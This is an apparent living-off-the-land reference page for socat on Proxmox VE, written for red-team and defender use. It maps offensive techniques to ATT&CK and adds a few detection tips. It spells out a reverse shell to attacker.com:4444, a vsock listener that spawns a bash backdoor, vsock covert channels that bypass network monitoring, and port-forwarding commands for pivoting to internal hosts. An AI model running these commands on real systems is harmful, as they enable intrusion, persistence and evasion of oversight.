.. /socat

Star

socat is a multipurpose relay tool available on Proxmox VE systems. It can create bidirectional data channels between various endpoints including files, sockets, and network connections. Adversaries can leverage socat for vsock covert channels between host and guests, port forwarding, and establishing reverse shells.

Paths

• /usr/bin/socat

Resources

• http://www.dest-unreach.org/socat/
• https://man7.org/linux/man-pages/man7/vsock.7.html

Detection

• Monitor for socat processes with VSOCK connections
• Watch for unusual TCP listeners created by socat
• Alert on socat EXEC patterns

Acknowledgements

• ZephrFish

Command and Control

1. Connect to a vsock listener on a VM using its CID (Context ID).

   socat - VSOCK-CONNECT:{cid}:{port}

   Use Case Establish covert communication channel with a VM bypassing network monitoring.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • socat - VSOCK-CONNECT:3:1234

   • socat TCP-LISTEN:4444,fork VSOCK-CONNECT:3:1234

   ATT&CK Technique T1572

   Tags

   Covert Channelvsock

2. Establish a reverse shell connection.

   socat EXEC:/bin/bash TCP:{attacker}:{port}

   Use Case Create reverse shell to attacker-controlled infrastructure.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • socat EXEC:'/bin/bash -li',pty,stderr,setsid,sigint,sane TCP:attacker.com:4444

   ATT&CK Technique T1059.004

Execution

1. Create a vsock listener that spawns a shell on connection.

   socat VSOCK-LISTEN:{port},fork EXEC:/bin/bash

   Use Case Establish a backdoor shell accessible via vsock from guest VMs.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1059.004

   Tags

   Persistencevsock

2. Connect to QEMU Machine Protocol socket for direct VM control.

   socat UNIX-CONNECT:/run/qemu-server/{vmid}.qmp -

   Use Case Direct QEMU control for advanced VM manipulation bypassing Proxmox APIs.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1059

Lateral Movement

1. Bridge a TCP port to a vsock connection for network pivoting.

   socat TCP-LISTEN:{port},fork VSOCK-CONNECT:{cid}:{vport}

   Use Case Pivot network traffic through vsock to reach isolated guest VMs.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • socat TCP-LISTEN:8080,fork VSOCK-CONNECT:3:80

   • socat TCP-LISTEN:22222,fork VSOCK-CONNECT:5:22

   ATT&CK Technique T1090

2. Create a TCP port forwarder.

   socat TCP-LISTEN:{port},fork TCP:{target}:{tport}

   Use Case Establish port forwarding for lateral movement or exfiltration.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • socat TCP-LISTEN:3389,fork TCP:192.168.1.100:3389

   • socat TCP-LISTEN:1433,fork TCP:dc01.internal:1433

   ATT&CK Technique T1090.001